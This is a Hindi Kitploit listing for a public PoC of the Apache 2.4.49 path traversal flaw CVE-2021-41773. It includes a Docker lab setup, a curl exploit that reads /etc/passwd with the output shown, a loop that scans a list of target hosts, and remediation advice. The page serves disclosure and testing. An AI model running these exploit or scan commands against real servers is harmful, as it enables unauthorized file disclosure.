Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41773h — Apache HTTP Server 2.4.49 की पथ ट्रैवर्सल भेद्यता (CVE-2021-41773) के लिए PoC और एक्सप्लॉइट, Docker सेटअप, curl-आधारित शोषण कमांड और निवारण मार्गदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/mightysai1997/cve-2021-41773h
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmightysai1997/cve-2021-41773h

CVE-2021-41773h

Apache HTTP Server 2.4.49 की पथ ट्रैवर्सल भेद्यता (CVE-2021-41773) के लिए PoC और एक्सप्लॉइट, Docker सेटअप, curl-आधारित शोषण कमांड और निवारण मार्गदर्शन के साथ।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773

Apache HTTP Server 2.4.49 में पथ ट्रैवर्सल और फ़ाइल प्रकटीकरण भेद्यता (CVE-2021-41773)

जानकारी

Apache HTTP Server 2.4.49 में पथ सामान्यीकरण में किए गए एक बदलाव में एक दोष पाया गया। एक हमलावर पथ ट्रैवर्सल हमले का उपयोग करके URLs को अपेक्षित दस्तावेज़ रूट के बाहर फ़ाइलों से मैप कर सकता है।

यदि दस्तावेज़ रूट के बाहर की फ़ाइलें "require all denied" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। इसके अतिरिक्त, यह दोष CGI स्क्रिप्ट जैसी व्याख्या की गई फ़ाइलों के स्रोत को लीक कर सकता है।

यह मुद्दा वास्तविक दुनिया में शोषण किए जाने के लिए जाना जाता है।

यह मुद्दा केवल Apache 2.4.49 को प्रभावित करता है, पिछले संस्करणों को नहीं।

स्वीकृति: यह मुद्दा cPanel सुरक्षा टीम के साथ Ash Daulton द्वारा रिपोर्ट किया गया था

सुरक्षा टीम को रिपोर्ट किया गया 2021-09-29 r1893775 द्वारा 2.4.50 में ठीक किया गया 2021-10-01 अपडेट 2.4.50 जारी 2021-10-04 प्रभावित करता है 2.4.49

POC

root@kitploit:~
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773

इसकी पुष्टि करें कि यह काम करता है

root@kitploit:~
$ curl -I http://localhost
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 13:25:18 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html

शोषण 1

root@kitploit:~
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

आउटपुट

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
utmp:x:100:406:utmp:/home/utmp:/bin/false

शोषण 2

root@kitploit:~
cat targets | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

आउटपुट

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
localhost Vulnerable

कैसे ठीक करें

  1. Apache HTTP Server 2.4.50 को अपडेट करें (2021-10-04 को जारी)
  2. Apache2 कॉन्फ़िगरेशन फ़ाइल में निम्नलिखित को अस्वीकार करें और संपादित करें:
root@kitploit:~
<!-- Vulnerable (Require all granted in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>

<!-- Patched (Require all denied in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all denied
</Directory>

संदर्भ

  • https://httpd.apache.org/security/vulnerabilities_24.html
टूल डाउनलोड करें